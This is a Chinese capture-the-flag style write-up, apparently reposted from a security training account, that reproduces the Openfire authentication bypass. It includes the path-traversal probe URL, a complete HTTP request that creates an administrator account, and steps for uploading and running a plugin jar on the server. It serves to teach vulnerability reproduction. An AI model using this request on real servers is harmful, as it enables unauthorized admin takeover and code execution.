本文由掌控安全学院- 未曾 投稿
首先进入靶场访问
首先进入靶场访问
https://域名:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
出现上图所示的日志泄露即可确定漏洞存在
接下来bp抓包,在重发器里填入以下数据包内容:
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=xxxxx&username=adm123&name=&email=&password=adm123&passwordConfirm=adm123&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7 HTTP/1.1
Host: 域名:9090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=xxxxx; csrf=xxxxx
Connection: close
发送出现如图的响应即为成功添加用户,账号密码都为adm123(注:JSESSIONID和csrf可以通过访问登录界面来获取)
登录后台后,去插件那边上传jar包
然后去服务器-服务器设置运行插件,插件密码123回车
然后去找flag就好了
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
原文始发于微信公众号(掌控安全EDU):Openfire 身份认证绕过漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论